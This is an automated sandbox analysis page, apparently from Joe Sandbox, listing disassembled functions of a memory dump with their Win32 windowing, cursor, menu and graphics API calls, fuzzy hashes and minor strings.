Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Create$Compatible$Bitmap$DeleteH_prolog3StretchTransparent
String ID:
API String ID: 646174778-0
Opcode ID: 190600bec8b656ca961f3a05ce553dad72f0ced5251ceb7d21ec8ae49cc626ec
Instruction ID: 8204215ee1a9b62b8141807434cc31000c7067c4ebd68cfae63cb43d5f886725
Opcode Fuzzy Hash: 190600bec8b656ca961f3a05ce553dad72f0ced5251ceb7d21ec8ae49cc626ec
Instruction Fuzzy Hash: 1991DE71810159AECF02EFA0CD85DEEBBB6FF18354F204159F51566260EB329E25EB60

Function 00BE2D30 Relevance: 18.2, APIs: 12, Instructions: 150windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BE29B8: LoadCursorA.USER32(00000000,00007F8B), ref: 00BE29D2
Part of subcall function 00BE29B8: LoadCursorW.USER32(?,00007901), ref: 00BE29EF

PeekMessageA.USER32(?,?,00000367,00000367,00000003), ref: 00BE2D68
PostMessageA.USER32(?,00000111,0000E145,00000000), ref: 00BE2DCB
SendMessageA.USER32(?,00000362,0000E002,00000000), ref: 00BE2DED
GetCursorPos.USER32(?), ref: 00BE2E08
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00BE2E34
ReleaseCapture.USER32 ref: 00BE2E81
SetCapture.USER32(?), ref: 00BE2E86
ReleaseCapture.USER32 ref: 00BE2E92
SendMessageA.USER32(?,00000362,?,00000000), ref: 00BE2EA6
SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 00BE2ED1
PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 00BE2EEF

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Message$CaptureCursorSend$LoadPeekPostRelease
String ID:
API String ID: 291007519-0
Opcode ID: 8949ac5c35372c2c3dfdc0d68121e295d64622ef993d5a8dde0bfeeeb2df9dde
Instruction ID: 5f0f6e944977678b2a7092811804ff551716ba4b5ae237837dcd5bee6d33f7e0
Opcode Fuzzy Hash: 8949ac5c35372c2c3dfdc0d68121e295d64622ef993d5a8dde0bfeeeb2df9dde
Instruction Fuzzy Hash: AF515071900648EFDB119F61CC85AAEBBFDFF48304F5184A9F556A6161DB70AD40DF10

Function 00C2C0B4 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 234windowCOMMON

Download Yara Rule

APIs

RealizePalette.GDI32(?), ref: 00C2C0FC
InflateRect.USER32(?,000000FE,000000FE), ref: 00C2C1D3
InflateRect.USER32(?,000000FF,000000FF), ref: 00C2C1EF

Part of subcall function 00C2BF7F: __EH_prolog3.LIBCMT ref: 00C2BF86
Part of subcall function 00C2BF7F: GetSystemPaletteEntries.GDI32(?,00000000,00000100,00000004), ref: 00C2BFEE
Part of subcall function 00C2BF7F: CreatePalette.GDI32(00000000), ref: 00C2C039

InflateRect.USER32(?,000000FF,000000FF), ref: 00C2C20B
GetNearestPaletteIndex.GDI32(?,000000FF), ref: 00C2C22E
FillRect.USER32(?,?,?), ref: 00C2C254
InflateRect.USER32(?,000000FE,000000FE), ref: 00C2C27B
FillRect.USER32(?,?), ref: 00C2C2CD
InflateRect.USER32(?,000000FF,000000FF), ref: 00C2C314

Strings

iii, xrefs: 00C2C1F1

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Inflate$Palette$Fill$CreateEntriesH_prolog3IndexNearestRealizeSystem
String ID: iii
API String ID: 1028858568-940974255
Opcode ID: 6d938d9823826a89e2c801a0034cf79935df7888952be11aeacfc70a2bd9b638
Instruction ID: d005792b31e4b7bc956a024987c30a9a47ebbe167d8aa88ae00b1c4ab012b01e
Opcode Fuzzy Hash: 6d938d9823826a89e2c801a0034cf79935df7888952be11aeacfc70a2bd9b638
Instruction Fuzzy Hash: 5C914F71900619AFCF01DFA4DC84AEDBBBAFF49320F104665F825AB291DB75AA05CF50

Function 00C5814C Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 199windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C58156
GetSystemMenu.USER32(?,00000000,00000214,00C0787D,00000000,00000000,00000001,?), ref: 00C581B8
IsMenu.USER32(?), ref: 00C581D1
IsMenu.USER32(?), ref: 00C581EB
SendMessageA.USER32(?,0000007F,00000000,00000000), ref: 00C58220
GetClassLongA.USER32(?,000000DE), ref: 00C58236
GetWindowLongA.USER32(?,000000F0), ref: 00C58281

Strings

0, xrefs: 00C5835E

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Menu$Long$ClassH_prolog3_MessageSendSystemWindow
String ID: 0
API String ID: 859179710-4108050209
Opcode ID: 97c61fd7a068f7cee60b3828a6ae63b96a13a8797a5f10f592691fbdd2fdfc32
Instruction ID: c1e0ed2a4d29787f2c93cde2439c92855397bd3659e1ac68f03bd65c1ec812bf
Opcode Fuzzy Hash: 97c61fd7a068f7cee60b3828a6ae63b96a13a8797a5f10f592691fbdd2fdfc32
Instruction Fuzzy Hash: 0F817F34500645DFDB21DF65CC88FAEB7B8FF44301F2446AAE8AAA6191DF305A89DF44

Function 00C1E242 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 163windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C1E257
SendMessageA.USER32(?,00001005,00000000,?), ref: 00C1E279
SHGetDesktopFolder.SHELL32(?), ref: 00C1E2B8
CreatePopupMenu.USER32 ref: 00C1E32C
GetMenuDefaultItem.USER32(00000000,00000000,00000000), ref: 00C1E35B
GetParent.USER32(?), ref: 00C1E388
GetParent.USER32(?), ref: 00C1E3CD
GetParent.USER32(?), ref: 00C1E3DC
SendMessageA.USER32(?,?,00000000,00000000), ref: 00C1E3F1

Strings

$, xrefs: 00C1E37E

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Parent$MenuMessageSend$CreateDefaultDesktopFolderItemPopup_memset
String ID: $
API String ID: 2190390364-3993045852
Opcode ID: f4a76cf83b905063e80c0e6c07ae6effdb257eec4506733184a80799d3fd28ba
Instruction ID: 2ec49f4215ce21428fffc706f8c17ad2c50b267605af1dee2d1400fbba57523a
Opcode Fuzzy Hash: f4a76cf83b905063e80c0e6c07ae6effdb257eec4506733184a80799d3fd28ba
Instruction Fuzzy Hash: 0D511874A00218AFCB21DFA5C888EDEBFB9EF49710F104599F915EB250D771DA81DB90

Function 00C6E48C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00C6E4BB
MonitorFromPoint.USER32(?,?,00000002), ref: 00C6E4ED
GetMonitorInfoA.USER32(00000000), ref: 00C6E4F4
CopyRect.USER32(00C15419,?), ref: 00C6E506
SystemParametersInfoA.USER32(00000030,00000000,00C15419,00000000), ref: 00C6E516
OffsetRect.USER32(?,00C15419,00000000), ref: 00C6E540
OffsetRect.USER32(?,?,00000000), ref: 00C6E56B
OffsetRect.USER32(?,00000000,00000000), ref: 00C6E598
OffsetRect.USER32(?,00000000,?), ref: 00C6E5BD

Strings

(, xrefs: 00C6E4E6

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Offset$InfoMonitor$CopyCursorFromParametersPointSystem
String ID: (
API String ID: 4030222242-3887548279
Opcode ID: d4efab9eaa6e0bd23a65ab9d7dfbdf7979120f50d0b443aa2e1fb011ae7857ec
Instruction ID: 8897fc4d6322210e328de2696fac8823f6bacc680c6347895eeaba0cb30bd6a5
Opcode Fuzzy Hash: d4efab9eaa6e0bd23a65ab9d7dfbdf7979120f50d0b443aa2e1fb011ae7857ec
Instruction Fuzzy Hash: BB411C75A00209DFDB24DFA9C9C4AAEFBB9FF48304F24412AE516E7250D770AE06CB51

Function 00C38CEC Relevance: 16.8, APIs: 11, Instructions: 343windowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C38D48
GetCursorPos.USER32(?), ref: 00C38D6D
ClientToScreen.USER32(?,?), ref: 00C38D8C
ScreenToClient.USER32(?,?), ref: 00C38E55
SendMessageA.USER32(?,00000202,0000FFFF,?), ref: 00C38E7C
SendMessageA.USER32(?,00000202,00000000,?), ref: 00C38EB6
GetParent.USER32(?), ref: 00C38EBF
GetWindowRect.USER32(?,?), ref: 00C38FB0
ClientToScreen.USER32(?,?), ref: 00C38FCF
OffsetRect.USER32(?,?,?), ref: 00C39029
RedrawWindow.USER32(?,?,00000000,000005B1), ref: 00C39085

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ClientRectScreenWindow$MessageSend$CursorOffsetParentRedraw
String ID:
API String ID: 1197204355-0
Opcode ID: f9b5a9ba83326395c57fd1c70f55f9d5fb293cf7c8e1e524059a172e92953f06
Instruction ID: 995e88406322273b82b3e9707fa5e394310b59d0ae71bed21decb0a6aa674c3a
Opcode Fuzzy Hash: f9b5a9ba83326395c57fd1c70f55f9d5fb293cf7c8e1e524059a172e92953f06
Instruction Fuzzy Hash: 93D12774A006149FCB14DFA8C898AEEBBF6FF89300F1441B9F816DB265DB70A945CB51

Function 00C0469F Relevance: 16.8, APIs: 11, Instructions: 269COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C0473D
GetParent.USER32(?), ref: 00C0474A
IsZoomed.USER32(?), ref: 00C047AE
SetWindowRgn.USER32(?,00000000,00000001), ref: 00C0480D
GetClientRect.USER32(?,?), ref: 00C04835
GetClientRect.USER32(?,?), ref: 00C0484A

Part of subcall function 00BD8095: ClientToScreen.USER32(?,?), ref: 00BD80A6
Part of subcall function 00BD8095: ClientToScreen.USER32(?,?), ref: 00BD80B3

GetWindowRect.USER32(?,?), ref: 00C0486A

Part of subcall function 00BE25F8: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,00BDE5B3,?,00BDE5B3,00000000,?,?,000000FF,000000FF,00000015), ref: 00BE2620

SetWindowRgn.USER32(?,00000000,00000001), ref: 00C049F5

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$ClientRect$Screen$ParentZoomed
String ID:
API String ID: 2314217310-0
Opcode ID: dd24d8348454297d8bfe5b0d3b0e704e837cb4b9205f49786b2b87d929631dc4
Instruction ID: fa5903e46171d10886221947a6e2a31de0cd3de269575f8cd733ce6989796dc1
Opcode Fuzzy Hash: dd24d8348454297d8bfe5b0d3b0e704e837cb4b9205f49786b2b87d929631dc4
Instruction Fuzzy Hash: A5B14FB19002199FDF14DFA5C984AEEBBB9FF48700F150169FA15AB255DB30AA00CBA1

Function 00BF8DC8 Relevance: 16.7, APIs: 11, Instructions: 192timeCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00BF8DFB
ScreenToClient.USER32(?,?), ref: 00BF8E08
PtInRect.USER32(?,?,?), ref: 00BF8E36
PtInRect.USER32(?,?,?), ref: 00BF8E5B
KillTimer.USER32(?,00000002), ref: 00BF8E8B
InvalidateRect.USER32(?,?,00000001), ref: 00BF8EA9
InvalidateRect.USER32(?,?,00000001), ref: 00BF8EB7
_clock.LIBCMT ref: 00BF8ECC
KillTimer.USER32(?,00000001), ref: 00BF8FD1
ValidateRect.USER32(?,00000000), ref: 00BF8FED
RedrawWindow.USER32(?,00000000,00000000,00000185), ref: 00BF902B

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$InvalidateKillTimer$ClientCursorRedrawScreenValidateWindow_clock
String ID:
API String ID: 3482734790-0
Opcode ID: 57e6c1794b7f228d64989f713da641ee8055ec41a85d4e9f2b364c2351d2cc02
Instruction ID: f9bc6f533d84977b4ceba374bdd4799ab12d538a659acd3fc5afbb7e18cab56e
Opcode Fuzzy Hash: 57e6c1794b7f228d64989f713da641ee8055ec41a85d4e9f2b364c2351d2cc02
Instruction Fuzzy Hash: 71716A31500A49EFCB21DF64C984FBABBF5FF88340F1048A9E25AD7260DB70A985DB41

Function 00CA8ABF Relevance: 16.7, APIs: 11, Instructions: 168windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,00000000), ref: 00CA8B0D
SetRectEmpty.USER32(?), ref: 00CA8B23
IsRectEmpty.USER32(?), ref: 00CA8B34
InvalidateRect.USER32(?,00000000,00000001), ref: 00CA8C51
UpdateWindow.USER32(?), ref: 00CA8C5A
GetParent.USER32(?), ref: 00CA8C63
SendMessageA.USER32(?,00000111,?,?), ref: 00CA8C8C

Part of subcall function 00CA8802: OffsetRect.USER32(?,00000000,?), ref: 00CA883C
Part of subcall function 00CA8802: InflateRect.USER32(?,00000002,00000002), ref: 00CA884A
Part of subcall function 00CA8802: InvalidateRect.USER32(?,?,00000001,?,?,?,00CA8AE8,?), ref: 00CA8859
Part of subcall function 00CA8802: UpdateWindow.USER32(?), ref: 00CA8862

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$EmptyInvalidateUpdateWindow$ClientInflateMessageOffsetParentSend
String ID:
API String ID: 53779109-0
Opcode ID: 2a64d375e5d9f516f8b97e529ebed6cb5c0ccd9fad0fcfeb019884fa20aca9a7
Instruction ID: fe21ef0217613e868e8729ee614eae66de5475b26d315ad05642ac21f10489cd
Opcode Fuzzy Hash: 2a64d375e5d9f516f8b97e529ebed6cb5c0ccd9fad0fcfeb019884fa20aca9a7
Instruction Fuzzy Hash: 86517B71A002199FCF11DFA4D884AEEBBF9FF49704F10056AE906EB251DB70AE45CB60

Function 00C4B44A Relevance: 16.6, APIs: 11, Instructions: 142windowCOMMON

Download Yara Rule

APIs

PtInRect.USER32(?,?,?), ref: 00C4B473
SetCapture.USER32 ref: 00C4B486
PtInRect.USER32(?,?,?), ref: 00C4B4B8
GetParent.USER32(?), ref: 00C4B4C5
SendMessageA.USER32(?,?,?,00000000), ref: 00C4B4DF
CopyRect.USER32(?,?), ref: 00C4B4EF
IsRectEmpty.USER32(?), ref: 00C4B4FC
SetCapture.USER32(?,?,?,00000000), ref: 00C4B513
SetRectEmpty.USER32(?), ref: 00C4B54B

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$CaptureEmpty$CopyMessageParentSend
String ID:
API String ID: 3593567511-0
Opcode ID: 618a0a03e5504ec0b31d19b8342f139a474f778fd17c3b9816f4812d362bde41
Instruction ID: a314a653cc24b9cd7fed72f4ae0c43d055bc96c230c2ad0730e8a8ff4f18f6ec
Opcode Fuzzy Hash: 618a0a03e5504ec0b31d19b8342f139a474f778fd17c3b9816f4812d362bde41
Instruction Fuzzy Hash: D6510471500249AFCF11DFA4CC88BAEBBB9FF08301F044569F91A9A265DB71EA04DB61

Function 00C4A42B Relevance: 16.6, APIs: 11, Instructions: 120COMMON

Download Yara Rule

APIs

PtInRect.USER32(?,?,?), ref: 00C4A475
GetParent.USER32(?), ref: 00C4A48B

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

IsRectEmpty.USER32(?), ref: 00C4A4D0
GetCursorPos.USER32(?), ref: 00C4A4E4
ScreenToClient.USER32(?,?), ref: 00C4A4ED
PtInRect.USER32(?,?,?), ref: 00C4A4FC
SetCursor.USER32(00000000), ref: 00C4A50C
IsRectEmpty.USER32(?), ref: 00C4A51E
GetCursorPos.USER32(?), ref: 00C4A532
ScreenToClient.USER32(?,?), ref: 00C4A53B
PtInRect.USER32(?,?,?), ref: 00C4A54A

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Cursor$ClientEmptyScreen$Exception@8H_prolog3ParentThrow
String ID:
API String ID: 479694263-0
Opcode ID: 90ad11815685fa76f584a7fc1a2a0ec726e6e186545cfc3326ac42156281c656
Instruction ID: 7e1629fcdd8e35d13864b0949016d35a18a5fb9d4af617cdc473b2fca87d4235
Opcode Fuzzy Hash: 90ad11815685fa76f584a7fc1a2a0ec726e6e186545cfc3326ac42156281c656
Instruction Fuzzy Hash: D1415C72940605EFCB21DBB5DC88FAEB7F8FF44351F04586AE55AD6120E630EA40EB21

Function 00C32226 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 240windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C2F2EF: GdipGetImagePixelFormat.GDIPLUS(?,00D3420C,00000000,00000000,?,00C32250,00000000,00000000,00D3420C), ref: 00C2F2FF

_free.LIBCMT ref: 00C32359
_free.LIBCMT ref: 00C323A5
GdipBitmapLockBits.GDIPLUS(?,00000000,00000001,00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00D3420C), ref: 00C3246E
_free.LIBCMT ref: 00C3249E

Part of subcall function 00C2F311: GdipGetImagePaletteSize.GDIPLUS(?,00000000,00000000,00000000,?,00C3230A,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00C2F325

GdipBitmapUnlockBits.GDIPLUS(00000005,?,?,00000000,00000001,00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00D3420C), ref: 00C3251A
_free.LIBCMT ref: 00C32595

Strings

&, xrefs: 00C322A6

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Gdip_free$BitmapBitsImage$FormatLockPalettePixelSizeUnlock
String ID: &
API String ID: 4092590016-3042966939
Opcode ID: 0fd2a67e86716d5e86a52d294ee2b9a7d2e90ffc4c42a764489eb2d2b5418579
Instruction ID: 3c63e02945bd85ff2dfa7f367d292adf14c054d33293ebe486215b90e904f4d9
Opcode Fuzzy Hash: 0fd2a67e86716d5e86a52d294ee2b9a7d2e90ffc4c42a764489eb2d2b5418579
Instruction Fuzzy Hash: ECA16BB19002289BCF21DB14CD80BAAB7B9AF44314F1084E9EB59A7251DB74AFC5DF58

Function 00C42CC1 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C42D2A
MonitorFromPoint.USER32(?,?,00000002), ref: 00C42D63
GetMonitorInfoA.USER32(00000000), ref: 00C42D6A
CopyRect.USER32(?,?), ref: 00C42D82
CopyRect.USER32(?,?), ref: 00C42D8C

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00C42DC3
GetSystemMetrics.USER32(00000022), ref: 00C42E41
GetSystemMetrics.USER32(00000023), ref: 00C42E48

Strings

(, xrefs: 00C42D5C

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: RectSystem$CopyInfoMetricsMonitor$Exception@8FromH_prolog3ParametersPointThrowWindow
String ID: (
API String ID: 348238172-3887548279
Opcode ID: c92bf05d8438f0a7402d953fd4dd81e987df90b1e20e61cb5a3a1847140b33b0
Instruction ID: 2b9f99c52fdde9ac6d14a8b0ae977340951b3f66c98f261d2a1030279fac7027
Opcode Fuzzy Hash: c92bf05d8438f0a7402d953fd4dd81e987df90b1e20e61cb5a3a1847140b33b0
Instruction Fuzzy Hash: EC5109B1E002099FCB14DFA9C985AEEBBF9FF88300F15456AE515E7255D730AA01CF61

Function 00C2434D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 137windowCOMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 00C24376
LoadCursorW.USER32(?,00007904), ref: 00C2439D
LoadCursorW.USER32(?,00007905), ref: 00C243BF
SendMessageA.USER32(?,00001201,00000000,00000006), ref: 00C24406
SendMessageA.USER32(?,00001201,00000001,00000006), ref: 00C2442A
SendMessageA.USER32(?,00000401,00000001,00000000), ref: 00C24464
SendMessageA.USER32(?,00000418,00000000,FFFFFFFF), ref: 00C2447E
GetParent.USER32(?), ref: 00C244A8

Strings

d, xrefs: 00C24413

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
